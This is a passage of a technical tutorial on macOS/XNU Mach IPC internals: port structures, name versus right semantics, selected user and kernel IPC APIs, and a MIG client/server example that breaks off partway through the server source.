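Note that even after the receive right of a Mach port has been released, if the port's reference count is not 0 (its rights are then dead names), the Mach port name still cannot be reused by the next port allocation.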

2. ipc_entry

A user-space Mach port name (an integer) corresponds to an ipc_entry in task->ipc_space->is_table in the kernel. The ipc_entry structure is declared as follows:

struct ipc_entry {
    struct ipc_object *ie_object;
    ipc_entry_bits_t ie_bits;
    mach_port_index_t ie_index;
    union {
        mach_port_index_t next;        /* next in freelist, or...  */
        ipc_table_index_t request;    /* dead name request notify */
    } index;
};

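The ie_object pointer field points to one of two structures: ipc_port or ipc_pset.

The ie_bits flag field records which kinds of right the given port name denotes.

3. ipc_port

The ipc_port structure corresponds to a single Mach port. It records the Mach message queue, the port's receiver and destination, kernel-stored data, and so on. The fields are not explained one by one here; they are covered as they come up.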

struct ipc_port {

    /*
     * Initial sub-structure in common with ipc_pset
     * First element is an ipc_object second is a
     * message queue
     */
    struct ipc_object ip_object;
    struct ipc_mqueue ip_messages;

    union {
        struct ipc_space *receiver;
        struct ipc_port *destination;
        ipc_port_timestamp_t timestamp;
    } data;

    union {
        ipc_kobject_t kobject;
        ipc_importance_task_t imp_task;
        ipc_port_t sync_qos_override_port;
    } kdata;
        
    struct ipc_port *ip_nsrequest;
    struct ipc_port *ip_pdrequest;
    struct ipc_port_request *ip_requests;
    union {
        struct ipc_kmsg *premsg;
        struct {
            sync_qos_count_t sync_qos[THREAD_QOS_LAST];
            sync_qos_count_t special_port_qos;
        } qos_counter;
    } kdata2;

    mach_vm_address_t ip_context;

    natural_t ip_sprequests:1,    /* send-possible requests outstanding */
          ip_spimportant:1,    /* ... at least one is importance donating */
          ip_impdonation:1,    /* port supports importance donation */
          ip_tempowner:1,    /* dont give donations to current receiver */
          ip_guarded:1,         /* port guarded (use context value as guard) */
          ip_strict_guard:1,    /* Strict guarding; Prevents user manipulation of context values directly */
          ip_specialreply:1,    /* port is a special reply port */
          ip_link_sync_qos:1,    /* link the special reply port to destination port */
          ip_impcount:24;    /* number of importance donations in nested queue */

    mach_port_mscount_t ip_mscount;
    mach_port_rights_t ip_srights;
    mach_port_rights_t ip_sorights;

#if MACH_ASSERT
#define IP_NSPARES  4
#define IP_CALLSTACK_MAX    16
/*  queue_chain_t   ip_port_links;*//* all allocated ports */
    thread_t    ip_thread;  /* who made me?  thread context */
    unsigned long   ip_timetrack;   /* give an idea of "when" created */
    uintptr_t   ip_callstack[IP_CALLSTACK_MAX]; /* stack trace */
    unsigned long   ip_spares[IP_NSPARES]; /* for debugging */
#endif  /* MACH_ASSERT */
};

4. ipc_pset

The ipc_pset structure corresponds to a set of Mach ports. Its declaration:

struct ipc_pset {

    /*
     * Initial sub-structure in common with all ipc_objects.
     */
    struct ipc_object    ips_object;
    struct ipc_mqueue    ips_messages;
};

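Note that the first field of both structures above is a struct ipc_object.
So when the ie_object pointer in an ipc_entry points to the ipc_object field of one of these structures, it is equivalent to pointing at the base address of the structure itself.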
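This is the usual C "common initial member" idiom. The sketch below shows it with toy types; demo_object, demo_port and demo_pset are hypothetical stand-ins, not the kernel definitions.

```c
#include <assert.h>
#include <stdint.h>

/* Toy stand-in for struct ipc_object. */
struct demo_object {
    uint32_t bits;
    uint32_t references;
};

/* Both containers start with the shared object header. */
struct demo_port {
    struct demo_object object;
    int queue_len;
};

struct demo_pset {
    struct demo_object object;
    int member_count;
};

/* Returns 1 if a pointer to the embedded header equals the base address. */
int demo_object_is_at_base(void) {
    struct demo_port port = { { 0, 1 }, 0 };
    return (void *)&port.object == (void *)&port;
}

/* Stores queue_len in a port, keeps only the header pointer (what an
 * ie_object-style field would hold), then recovers the port from it. */
int demo_queue_len_via_object(int queue_len) {
    struct demo_port port = { { 0, 1 }, queue_len };
    struct demo_object *entry_object = &port.object;
    struct demo_port *same_port = (struct demo_port *)entry_object;
    assert(same_port == &port);
    return same_port->queue_len;
}
```

C guarantees that a pointer to a structure, suitably converted, points to its first member and vice versa, which is why a single pointer field can refer to either container.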

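5. mach_port_t and mach_port_name_t

Note: this section is fairly important.

When calling Mach APIs from user space you constantly see the types mach_port_t and mach_port_name_t, and it is easy to mix them up (I certainly did while learning Mach).

The reasons for the confusion are simple:

In user space, values of both types print as the same integer.
Many Mach APIs are called with a mach_port_t value passed directly as a mach_port_name_t argument.
Some function declarations add to the confusion: the parameter has type mach_port_t, yet it is named name.

Although the two types carry the same value in user space, they differ markedly inside the kernel.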

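A port name (mach_port_name_t) merely denotes a port within a particular task and carries no information about any right to that port.
A port (mach_port_t), by contrast, is a reference to which port rights can be added or removed. When the kernel returns such a reference to user space, what user space receives is the name of that reference, i.e. a port name. That is why, in user space, the mach_port_name_t and mach_port_t values returned by the kernel are the same integer.
Normally, for a given Mach port, the names referring to different rights are distinct. There are exceptions, described later in this section.
Note, however, that in the kernel a mach_port_t really does map to an ipc_port structure, which contains the data about port rights. A mach_port_name_t is only an integer representation of a Mach port; it maps to no ipc_port structure and therefore carries no right information for the port.

One more point: for a particular Mach port (i.e. the same ipc_port structure), if a task holds several rights to it, for example both a send right and a receive right, the names of those rights are merged into one, so a single name can denote both the send right and the receive right of the port. A send-once right, however, is always named separately: there is always a distinct name that denotes that send-once right to the port.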

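Once the two types are clearly separated, the relationships among mach_port_t, mach_port_name_t, Mach port rights and Mach ports fall into place, which helps a great deal in understanding Mach IPC. Here is a full summary of how ports, rights and names relate:

What we usually call a Mach port is the ipc_port structure in the kernel; messages can be sent to and received from it.
A Mach port may have rights in some tasks. These rights specify what the task may do with the port, such as receiving or sending messages. Any Mach port to which the current task holds a right has an ipc_entry in the task's ipc_space that refers to its ipc_port structure.
So in the kernel (not in user space), a mach_port_t denotes a reference to a right on a Mach port within the current task.
Note that in the kernel a mach_port_t does not directly represent a Mach port. Confusing, isn't it?
A mach_port_name_t, in both the kernel and user space, merely denotes a Mach port; no right is involved, let alone a reference to one.
When the kernel returns a mach_port_t reference to user space, what user space receives is in fact the name of that right, unlike in the kernel. In other words, in user space a mach_port_t value is the name of a right to some Mach port (not a direct reference to the right). This is why a mach_port_t value and a mach_port_name_t value are the same.
Continuing from that, a mach_port_t value in user space is normally the name of a single right on some Mach port.
However, if a mach_port_t already names the send right of a Mach port and the user then requests a name for the receive right of the same port (a right of a different type), the request reuses the existing send right name, so the name ends up denoting both the send right and the receive right.
This mechanism is called name coalescing: names of rights of different types can be merged into one name that denotes several rights. Send-once right names, however, cannot be coalesced.
For example, if two mach_port_t values name the send right and a send-once right of the same Mach port, the two values are different.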
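The coalescing rule can be modelled with a toy name table. This is only a sketch of the rule as described above, not kernel code: demo_space, demo_entry and demo_add_right are hypothetical, and a name here is simply a table index plus one.

```c
#include <assert.h>

enum { DEMO_RIGHT_SEND = 1, DEMO_RIGHT_RECEIVE = 2, DEMO_RIGHT_SEND_ONCE = 4 };
#define DEMO_MAX_NAMES 8

struct demo_entry { int port_id; unsigned rights; }; /* port_id 0 = unused */
struct demo_space { struct demo_entry table[DEMO_MAX_NAMES]; };

/* Adds a right to port_id and returns the name that denotes it, or 0 if
 * the table is full. Send and receive rights to the same port share one
 * name; every send-once right gets a fresh name. */
int demo_add_right(struct demo_space *space, int port_id, unsigned right) {
    int free_slot = -1;
    assert(port_id != 0);
    for (int i = 0; i < DEMO_MAX_NAMES; i++) {
        struct demo_entry *entry = &space->table[i];
        if (entry->port_id == 0) {
            if (free_slot < 0)
                free_slot = i;
            continue;
        }
        if (right != DEMO_RIGHT_SEND_ONCE && entry->port_id == port_id &&
            !(entry->rights & DEMO_RIGHT_SEND_ONCE)) {
            entry->rights |= right; /* coalesce into the existing name */
            return i + 1;
        }
    }
    if (free_slot < 0)
        return 0;
    space->table[free_slot].port_id = port_id;
    space->table[free_slot].rights = right;
    return free_slot + 1;
}

/* Returns 1 if a receive right and a send right end up under one name. */
int demo_send_and_receive_share_name(void) {
    struct demo_space space = {0};
    int receive_name = demo_add_right(&space, 42, DEMO_RIGHT_RECEIVE);
    int send_name = demo_add_right(&space, 42, DEMO_RIGHT_SEND);
    return receive_name != 0 && receive_name == send_name;
}

/* Returns 1 if each send-once right is given a name of its own. */
int demo_send_once_gets_own_name(void) {
    struct demo_space space = {0};
    int send_name = demo_add_right(&space, 42, DEMO_RIGHT_SEND);
    int once_a = demo_add_right(&space, 42, DEMO_RIGHT_SEND_ONCE);
    int once_b = demo_add_right(&space, 42, DEMO_RIGHT_SEND_ONCE);
    return send_name != once_a && send_name != once_b && once_a != once_b;
}
```

On a real system the same effect is visible when mach_port_allocate and mach_port_insert_right are called with the same name, as the earlier receiver code does: the port name then carries both the receive right and the send right.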

VII. Selected Basic IPC APIs

1. User Mode

a. mach_port_names

Purpose: returns information about the port namespace of the specified task.

The function is declared as follows:

kern_return_t   mach_port_names
                (ipc_space_t                               task,
                 mach_port_name_array_t                  *names,
                 mach_msg_type_number_t               *namesCnt,
                 mach_port_type_array_t                  *types,
                 mach_msg_type_number_t               *typesCnt);

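where

task: the task port to inspect; the caller must hold a send right to the target task's Mach port.
names: an array of mach_port_name_t that receives the query result.
namesCnt: the number of elements in the names array.
types: an array holding the right types for each corresponding name in names.
typesCnt: the number of elements in the types array.

namesCnt should certainly equal typesCnt.

The interface returns two separate counts because it is generated by the Mach Interface Generator (MIG).

Note that the names and types buffers are allocated automatically, so release them with vm_deallocate once you are done with them.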

b. mach_port_get_attributes

Purpose: queries information about the specified port.

Function declaration:

kern_return_t   mach_port_get_attributes
                (ipc_space_t                               task,
                 mach_port_name_t                          name,
                 mach_port_flavor_t                      flavor,
                 mach_port_info_t                     port_info,
                 mach_msg_type_number_t        *port_info_count);

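The parameters are:

task: the task that holds the port being queried.
name: the name of the port being queried.
flavor: the kind of information requested.
Two flavors are covered here:
- MACH_PORT_LIMITS_INFO: returns the port's resource limits (mach_port_limits).
- MACH_PORT_RECEIVE_STATUS: returns information about the rights and messages associated with the port (mach_port_status).
port_info: a pointer to the buffer that receives the result.
port_info_count: the maximum number of result elements the buffer can hold. On return it is updated to the number actually returned.

A simple example that combines the two functions above: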

#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>

#define EXIT_ON_MACH_ERROR(msg, retval) \
    if (kr != KERN_SUCCESS)   { mach_error(msg ":", kr); exit((retval)); }

void print_mach_port_type(mach_port_type_t type)
{
    if (type & MACH_PORT_TYPE_SEND)         printf("SEND ");
    if (type & MACH_PORT_TYPE_RECEIVE)      printf("RECEIVE ");
    if (type & MACH_PORT_TYPE_SEND_ONCE)    printf("SEND_ONCE ");
    if (type & MACH_PORT_TYPE_PORT_SET)     printf("PORT_SET ");
    if (type & MACH_PORT_TYPE_DEAD_NAME)    printf("DEAD_NAME ");
    if (type & MACH_PORT_TYPE_DNREQUEST)    printf("DNREQUEST ");
    printf("\n");
}

int main(int argc, char **argv)
{
    int i;
    pid_t pid;
    kern_return_t kr;
    mach_port_name_array_t names;
    mach_port_type_array_t types;
    mach_msg_type_number_t ncount, tcount;
    mach_port_limits_t port_limits;
    mach_port_status_t port_status;
    mach_msg_type_number_t port_info_count;
    task_t task;
    task_t mytask = mach_task_self();

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        exit(1);
    }

    pid = atoi(argv[1]);
    kr = task_for_pid(mytask, (int)pid, &task);
    EXIT_ON_MACH_ERROR("task_for_pid", kr);

    // retrieve a list of the rights present in the given task's IPC space,
    // along with type information (no particular ordering)
    kr = mach_port_names(task, &names, &ncount, &types, &tcount);
    EXIT_ON_MACH_ERROR("mach_port_names", kr);

    printf("%8s %8s %8s %8s %8s task rights\n",
           "name", "q-limit", "seqno", "msgcount", "sorights");
    for (i = 0; i < ncount; i++)
    {
        printf("%08x ", names[i]);

        // get resource limits for the port
        port_info_count = MACH_PORT_LIMITS_INFO_COUNT;
        kr = mach_port_get_attributes(
            task,                           // the IPC space in question
            names[i],                       // task's name for the port
            MACH_PORT_LIMITS_INFO,          // information flavor desired
            (mach_port_info_t)&port_limits, // outcoming information
            &port_info_count);              // size returned
        if (kr == KERN_SUCCESS)
            printf("%8d ", port_limits.mpl_qlimit);
        else
            printf("%8s ", "-");

        // get miscellaneous information about associated rights and messages
        port_info_count = MACH_PORT_RECEIVE_STATUS_COUNT;
        kr = mach_port_get_attributes(task, names[i], MACH_PORT_RECEIVE_STATUS,
                                      (mach_port_info_t)&port_status,
                                      &port_info_count);
        if (kr == KERN_SUCCESS)
        {
            printf("%8d %8d %8d ",
                   port_status.mps_seqno,     // current sequence # for the port
                   port_status.mps_msgcount,  // # of messages currently queued
                   port_status.mps_sorights); // # of send-once rights
        }
        else
            printf("%8s %8s %8s ", "-", "-", "-");
        print_mach_port_type(types[i]);
    }

    vm_deallocate(mytask, (vm_address_t)names, ncount * sizeof(mach_port_name_t));
    vm_deallocate(mytask, (vm_address_t)types, tcount * sizeof(mach_port_type_t));

    exit(0);
}

Sample output: (screenshot omitted)

c. mach_port_request_notification

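When a Mach port is destroyed, the rights held by other tasks all turn into dead names, so a sender learns that the target port is gone the next time it tries to send a message.

If the sender wants to be notified as soon as the target port is destroyed, rather than finding out only when it next sends data, it can use mach_port_request_notification. This function registers a notification request for events on the target Mach port. Its declaration is: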

kern_return_t   mach_port_request_notification
                (ipc_space_t                               task,
                 mach_port_name_t                          name,
                 mach_msg_id_t                          variant,
                 mach_port_mscount_t                       sync,
                 mach_port_send_once_t                   notify,
                 mach_msg_type_name_t               notify_type,
                 mach_port_send_once_t                *previous);

The parameters are not described here; they will be filled in once a concrete use case comes up.

2. Kernel Mode

a. ipc_entry_lookup

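Note: ipc_right_lookup_write is a wrapper around this function, and ipc_right_lookup_read is in turn a macro for ipc_right_lookup_write.

Purpose: given a user-space Mach port name, look up the corresponding ipc_entry_t in the task's IPC space structure in the kernel.

The code first: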

ipc_entry_t
ipc_entry_lookup(
    ipc_space_t        space,
    mach_port_name_t    name)
{
    mach_port_index_t index;
    ipc_entry_t entry;

    assert(is_active(space));
    // Extract the table index encoded in the name
    index = MACH_PORT_INDEX(name);
    if (index < space->is_table_size) {
        entry = &space->is_table[index];
        if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
            IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) {
            entry = IE_NULL;
        }
    }
    else {
        entry = IE_NULL;
    }

    assert((entry == IE_NULL) || IE_BITS_TYPE(entry->ie_bits));
    return entry;
}

In ipc_entry_lookup we can see that a mach_port_name_t (aka unsigned int) is split into two parts, MACH_PORT_INDEX and MACH_PORT_GEN. They are composed as follows:

#define MACH_PORT_INDEX(name)       ((name) >> 8)
#define MACH_PORT_GEN(name)         (((name) & 0xff) << 24)
#define MACH_PORT_MAKE(index, gen)  \
        (((index) << 8) | (gen) >> 24)

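Where:

MACH_PORT_INDEX serves as the index into task->ipc_space->is_table, somewhat like a file descriptor.
MACH_PORT_GEN records which generation the current Mach port belongs to. My guess is that this distinguishes the port from earlier, already released Mach ports that used the same index, so that a stale name is not confused with the current one.

One more thing to note: the 32 bits of a mach_port_name_t are laid out as follows: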

+--------------------+-----+
|   is_table index   | gen |
+--------------------+-----+
32                   8     0

In the ie_bits field of the ipc_entry structure, however, the 32 bits are laid out as follows:

+-----+-----+------+----------------+
| gen |     | type | user-reference |
+-----+-----+------+----------------+
32    24    21     16               0
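The two layouts explain why MACH_PORT_GEN shifts the low byte of the name up by 24 bits: the result lines up with the gen field of ie_bits, so the two can be compared directly. The sketch below reuses the three macros quoted earlier; the `DEMO_IE_*` masks and the `demo_*` helpers are hypothetical names that I derived from the diagram, not identifiers taken from the kernel source.

```c
#include <assert.h>
#include <stdint.h>

/* Name layout, copied from the macros quoted above. */
#define MACH_PORT_INDEX(name)       ((name) >> 8)
#define MACH_PORT_GEN(name)         (((name) & 0xff) << 24)
#define MACH_PORT_MAKE(index, gen)  (((index) << 8) | (gen) >> 24)

/* Hypothetical masks derived from the ie_bits diagram. */
#define DEMO_IE_GEN_MASK    0xff000000u   /* bits 24..31 */
#define DEMO_IE_TYPE_MASK   0x001f0000u   /* bits 16..20 */
#define DEMO_IE_UREFS_MASK  0x0000ffffu   /* bits 0..15  */

/* Builds a name from a table index and a small generation number (0..255). */
static uint32_t demo_make_name(uint32_t index, uint32_t gen_number)
{
    assert(index < (1u << 24) && gen_number <= 0xff);
    return MACH_PORT_MAKE(index, gen_number << 24);
}

/* Returns 1 when the generation in the name matches the one in the entry. */
static int demo_gen_matches(uint32_t name, uint32_t ie_bits)
{
    return MACH_PORT_GEN(name) == (ie_bits & DEMO_IE_GEN_MASK);
}
```

For instance, the name 0x1203 decodes to index 0x12 and generation 3. An entry whose ie_bits carry generation 3 matches that name, whereas the name 0x1204 (same index, different generation) would be rejected by the generation check in ipc_entry_lookup.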

b. ipc_right_copyin

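First, a quick look at the naming convention:
xxx_copyin: called on the sending side
xxx_copyout: called on the receiving side

Based on the msgt_name (mach_msg_type_name_t) passed in, ipc_right_copyin updates certain fields of the ipc_port structure referenced by the target ipc_entry_t and returns the corresponding ipc_port pointer to its caller.

Recalling the ipc_port fields shown earlier, the function mainly increments the following three (other fields are not reproduced here):

mach_port_mscount_t ip_mscount; // number of make-send operations
mach_port_rights_t ip_srights;  // number of send rights that currently exist
mach_port_rights_t ip_sorights; // number of send-once rights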

The function operates on Mach port rights. The main msgt_name values, which describe how a right is transferred, are:

#define MACH_MSG_TYPE_MOVE_RECEIVE      16    /* Must hold receive right */
#define MACH_MSG_TYPE_MOVE_SEND         17    /* Must hold send right(s) */
#define MACH_MSG_TYPE_MOVE_SEND_ONCE    18    /* Must hold sendonce right */
#define MACH_MSG_TYPE_COPY_SEND         19    /* Must hold send right(s) */
#define MACH_MSG_TYPE_MAKE_SEND         20    /* Must hold receive right */
#define MACH_MSG_TYPE_MAKE_SEND_ONCE    21    /* Must hold receive right */
#define MACH_MSG_TYPE_COPY_RECEIVE      22    /* NOT VALID */
#define MACH_MSG_TYPE_DISPOSE_RECEIVE   24    /* must hold receive right */
#define MACH_MSG_TYPE_DISPOSE_SEND      25    /* must hold send right(s) */
#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26    /* must hold sendonce right */

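We do not need to dig into this function for now. It is enough to know that, besides some right handling, it returns the ipc_port structure referenced by the ipc_entry to the caller.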
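To make the counter updates concrete, here is a heavily simplified model of how I understand three of the dispositions to affect the counters. It is a sketch under stated assumptions, not the kernel's logic: `demo_port_t` and `demo_copyin` are hypothetical, and the checks on the rights the caller actually holds, dead ports, and user references are all left out.

```c
#include <assert.h>
#include <stddef.h>

/* Disposition values copied from the list above. */
#define MACH_MSG_TYPE_COPY_SEND       19
#define MACH_MSG_TYPE_MAKE_SEND       20
#define MACH_MSG_TYPE_MAKE_SEND_ONCE  21

/* Toy port holding only the three counters discussed above. */
typedef struct {
    unsigned ip_mscount;
    unsigned ip_srights;
    unsigned ip_sorights;
} demo_port_t;

/* Returns 0 on success, -1 for dispositions this sketch does not model. */
static int demo_copyin(demo_port_t *port, int msgt_name)
{
    assert(port != NULL);

    switch (msgt_name) {
    case MACH_MSG_TYPE_MAKE_SEND:       /* new send right made from a receive right */
        port->ip_mscount++;
        port->ip_srights++;
        return 0;
    case MACH_MSG_TYPE_COPY_SEND:       /* an existing send right is duplicated */
        port->ip_srights++;
        return 0;
    case MACH_MSG_TYPE_MAKE_SEND_ONCE:  /* new send-once right made from a receive right */
        port->ip_sorights++;
        return 0;
    default:
        return -1;
    }
}
```

After one MAKE_SEND, one COPY_SEND, and one MAKE_SEND_ONCE on a fresh toy port, the counters read ip_mscount = 1, ip_srights = 2, and ip_sorights = 1.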

c. port_name_to_task

Purpose: in kernel space, resolve a task port name passed in from user space (just an integer value) to the task structure it actually refers to.

The code:

task_t
port_name_to_task(
    mach_port_name_t name)
{
    ipc_port_t kern_port;
    kern_return_t kr;
    task_t task = TASK_NULL;

    if (MACH_PORT_VALID(name)) {
        kr = ipc_object_copyin(current_space(), name,
                       MACH_MSG_TYPE_COPY_SEND,
                       (ipc_object_t *) &kern_port);
        if (kr != KERN_SUCCESS)
            return TASK_NULL;

        task = convert_port_to_task(kern_port);

        if (IP_VALID(kern_port))
            ipc_port_release_send(kern_port);
    }
    return task;
}

Internally, the function passes the task port name to ipc_object_copyin to obtain the ipc_port structure of the task port. Then convert_port_to_task reads the ip_kobject field of that ipc_port and uses its value as the pointer to the target task structure.

d. mach_msg

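mach_msg is the API that user programs call to send and receive Mach messages.

The complete flow chart: (figure omitted)

mach_msg_overwrite_trap is the kernel function that actually handles sending and receiving for mach_msg. Its implementation has two parts, sending a message and receiving a message: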

mach_msg_return_t
mach_msg_overwrite_trap(
    struct mach_msg_overwrite_trap_args *args)
{
    mach_vm_address_t       msg_addr = args->msg;
    mach_msg_option_t       option = args->option;
    mach_msg_size_t         send_size = args->send_size;
    mach_msg_size_t         rcv_size = args->rcv_size;
    mach_port_name_t        rcv_name = args->rcv_name;
    mach_msg_timeout_t      msg_timeout = args->timeout;
    mach_msg_priority_t     override = args->override;
    mach_vm_address_t       rcv_msg_addr = args->rcv_msg;
    __unused mach_port_seqno_t temp_seqno = 0;

    mach_msg_return_t  mr = MACH_MSG_SUCCESS;
    vm_map_t map = current_map();

    /* Only accept options allowed by the user */
    option &= MACH_MSG_OPTION_USER;
    
    if (option & MACH_SEND_MSG) { /* ... ipc_kmsg_send(xxx) ... */ }
    if (option & MACH_RCV_MSG) { /* ... ipc_mqueue_receive_on_thread(xxx) ... */ }
    
    return MACH_MSG_SUCCESS;
}

The ipc_kmsg_t structure is the in-kernel message to be sent. It is defined as follows:

struct ipc_kmsg {
    mach_msg_size_t            ikm_size;
    struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
    struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
    mach_msg_header_t          *ikm_header;      // pointer to the Mach message
    ipc_port_t                 ikm_prealloc;     /* port we were preallocated from */
    ipc_port_t                 ikm_voucher;      /* voucher port carried */
    mach_msg_priority_t        ikm_qos;          /* qos of this kmsg */
    mach_msg_priority_t        ikm_qos_override; /* qos override on this kmsg */
    struct ipc_importance_elem *ikm_importance;  /* inherited from */
    queue_chain_t              ikm_inheritance;  /* inherited from link */
    sync_qos_count_t sync_qos[THREAD_QOS_LAST];  /* sync qos counters for ikm_prealloc port */
    sync_qos_count_t special_port_qos;           /* special port qos for ikm_prealloc port */
#if MACH_FLIPC
    struct mach_node           *ikm_node;        /* Originating node - needed for ack */
#endif
};

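The structure has quite a few fields, one of which is a pointer to the Mach message to be sent.

Given my current knowledge, the kernel-side details are left for a later, deeper analysis.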

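VIII. MIG

1. Overview

No discussion of Mach IPC is complete without MIG (Mach Interface Generator). We will not go into the detailed usage and syntax of MIG here, only its purpose and why it matters.

From the examples above we know that Mach IPC can be used for RPC (remote procedure call). Put simply: when the client "calls" a remote method, the server receives the request over Mach IPC and actually executes the method, then sends the result back to the client over Mach IPC, so the call is transparent to the client.

If the client needs to call many methods, developers must not only implement the methods themselves but also hand-write the message handling and dispatching on both ends of the Mach IPC channel. That work is repetitive, tedious, and mechanical, and it drags development efficiency down.

MIG takes care of the latter, so developers can focus on implementing the methods.

From a user-written RPC specification file (a .defs file), MIG generates client/server code that automatically prepares, sends, receives, and unpacks Mach messages. Because the code is generated, it is also more consistent and less error-prone.

MIG generates three files:

a header file for user code to include
a client-side source file, to be linked with the rest of the client code
a server-side source file, to be linked with the rest of the server code; it automatically handles message reception, dispatch, the function call, and the reply

Here is an example: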

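2. A Client/Server Example

a. Overview

In this part we look at how to build a simple client/server program with MIG.

In this client/server project, the server exposes two interfaces:

string_length: returns the length of the string passed in
factorial: computes the factorial of the number passed in

This example comes from *OS Internal Vol 1.

b. Shared miscellaneous header

First, the miscellaneous header shared by the client and the server: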

// misc_types.h 
 
#ifndef _MISC_TYPES_H_ 
#define _MISC_TYPES_H_ 
 
#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
// The server port will be registered under this name. 
#define MIG_MISC_SERVICE "MIG-miscservice" 
 
// Data representations 
typedef char input_string_t[64]; 
typedef int xput_number_t; 
 
typedef struct { 
    mach_msg_header_t head; 
 
    // The following fields do not represent the actual layout of the request 
    // and reply messages that MIG will use. However, a request or reply 
    // message will not be larger in size than the sum of the sizes of these 
    // fields. We need the size to put an upper bound on the size of an 
    // incoming message in a mach_msg() call. 
    NDR_record_t NDR; 
    union { 
        input_string_t string; 
        xput_number_t number; 
    } data; 
    kern_return_t      RetCode; 
    mach_msg_trailer_t trailer;
} msg_misc_t; 
 
xput_number_t misc_translate_int_to_xput_number_t(int); 
int           misc_translate_xput_number_t_to_int(xput_number_t); 
void          misc_remove_reference(xput_number_t); 
kern_return_t string_length(mach_port_t, input_string_t, xput_number_t *); 
kern_return_t factorial(mach_port_t, xput_number_t, xput_number_t *); 
 
#endif // _MISC_TYPES_H_

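This header defines two types, input_string_t and xput_number_t, and declares several functions.

Two of those functions are the interfaces we want to export; the other three are called from within the MIG-generated code and are explained shortly.

The msg_misc_t structure is declared only so that the server can pass its size as the maximum message length when calling mach_msg_server; it is never actually instantiated.

c. RPC defs

Next, the defs file:

The notation used in the defs file is explained in comments inside the file, so it is not repeated below.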

/* 
 * A "Miscellaneous" Mach Server 
 */ 
 
/* 
 * File:    misc.defs 
 * Purpose: Miscellaneous Server subsystem definitions 
 */ 
 
/* 
 * Subsystem identifier 
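 * The interface IDs in this MIG file start at 500, and every module generated from this file is named `misc`.
 * This string also determines the names of the generated files such as `*Server.c` and `*User.c`.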
 */ 
Subsystem misc 500; 
 
/* 
 * Type declarations 
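 * Type specification section: defines the data types of the routine parameters.
 *     MIG supports declarations of simple, structured, pointer, and polymorphic types.
 */ 
#include <mach/std_types.defs>
#include <mach/mach_types.defs>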

type input_string_t = array[64] of char; 
/* 
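 * A few words of explanation:
 * First, xput_number_t is declared with the underlying type int.
 * InTran: when an int is passed in and must be converted to xput_number_t, misc_translate_int_to_xput_number_t is called to do the conversion.
 * OutTran: when an int must be passed out and has to be converted from xput_number_t, misc_translate_xput_number_t_to_int is called to do the conversion.
 * Destructor: this function runs when a variable of type xput_number_t needs to be destroyed.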
 */
type xput_number_t  = int 
         CType      : int 
         InTran     : xput_number_t misc_translate_int_to_xput_number_t(int) 
         OutTran    : int misc_translate_xput_number_t_to_int(xput_number_t) 
         Destructor : misc_remove_reference(xput_number_t) 
    ; 
 
/* 
 * Import declarations 
 */ 
import "misc_types.h"; 
 
/* 
 * Operation descriptions 
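 * Note that every routine declaration must contain at least one parameter of type mach_port_t.
 * On the client side, this parameter selects the server the call is sent to.
 * On the server side, the implementation also receives a mach_port_t value, which it can use to tell which port the request arrived on.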
 */ 
 
/* This should be operation #500 */ 
routine string_length( 
                         server_port : mach_port_t; 
                      in instring    : input_string_t; 
                     out len         : xput_number_t); 
/* Create some holes in operation sequence */ 
/* Skip IDs 501, 502 and 503. Skip keeps the interface numbering compatible across versions, somewhat like reserved field numbers in protobuf. */
Skip; 
Skip; 
Skip; 
 
/* This should be operation #504, as there are three Skip's */ 
routine factorial( 
                     server_port : mach_port_t; 
                  in num         : xput_number_t; 
                 out fac         : xput_number_t); 
 
/* 
 * Option declarations 
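 * Two prefixes are set here. They are prepended to the names of the IPC functions that are called (client side) and implemented (server side), respectively.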
 */ 
ServerPrefix Server_; 
UserPrefix   Client_;

For more MIG defs syntax, see Using Mach Messages - NeXTstep 3.3 Developer Documentation.
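The effect of the subsystem base (500) and the three Skip statements in misc.defs can be pictured as a dispatch table indexed by message ID minus the base. The code below is my own simplified model of that idea, not the output of mig: every `demo_*` name and the `DEMO_BAD_ID` code are hypothetical, and the handlers take plain C arguments instead of Mach messages.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DEMO_SUBSYSTEM_BASE 500   /* from "Subsystem misc 500;" */
#define DEMO_BAD_ID         (-1)  /* hypothetical error code for this sketch */

typedef int (*demo_routine_t)(const char *text, int number, int *out);

static int demo_string_length(const char *text, int number, int *out)
{
    (void)number;                  /* unused by this routine */
    *out = (int)strlen(text);
    return 0;
}

static int demo_factorial(const char *text, int number, int *out)
{
    (void)text;                    /* unused by this routine */
    int result = 1;
    for (int i = 2; i <= number; i++)
        result *= i;
    *out = result;
    return 0;
}

/* One slot per message ID; each Skip leaves a NULL hole. */
static const demo_routine_t demo_table[] = {
    demo_string_length,  /* 500 */
    NULL,                /* 501: Skip */
    NULL,                /* 502: Skip */
    NULL,                /* 503: Skip */
    demo_factorial,      /* 504 */
};

/* Looks up the routine for msg_id and calls it, rejecting holes and unknown IDs. */
static int demo_dispatch(int msg_id, const char *text, int number, int *out)
{
    assert(out != NULL);
    int slot = msg_id - DEMO_SUBSYSTEM_BASE;
    int slots = (int)(sizeof(demo_table) / sizeof(demo_table[0]));
    if (slot < 0 || slot >= slots || demo_table[slot] == NULL)
        return DEMO_BAD_ID;
    return demo_table[slot](text, number, out);
}
```

Because the holes keep their slots, a routine added later in place of a Skip would not shift the ID of factorial, which is the compatibility benefit the comment in the defs file refers to.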

d. Server

Server source:

// server.c 

#include 
#include "misc_types.h" 

extern boolean_t misc_server(mach_msg_header_t *inhdr, 
                             mach_msg_header_t *outhdr); 

// InTran 
xput_number_t 
misc_translate_int_to_xput_number_t(int param) { 
     printf("misc_translate_incoming(%d)\n", param); 
     return (xput_number_t)param; 
} 
 
// OutTran 
int 
misc_translate_xput_number_t_to_int(xput_number_t param) { 
     printf("misc_translate_outgoing(%d)\n", (int)param); 
     return (int)param; 
} 
 
// Destructor 
void 
misc_remove_reference(xput_number_t param) { 
     printf("misc_remove_reference(%d)\n", (int)param); 
} 
 
// an operation that we export 
kern_return_t 
string_length(mach_port_t     server_port, 
              input_string_t  instring, 
              xput_number_t  *len) 
{ 
    if (!instring || !len) 
        return KERN_INVALID_ADDRESS; 
 
    *len = strlen(instring);
 
    return KERN_SUCCESS; 
} 
 
// an operation that we export 
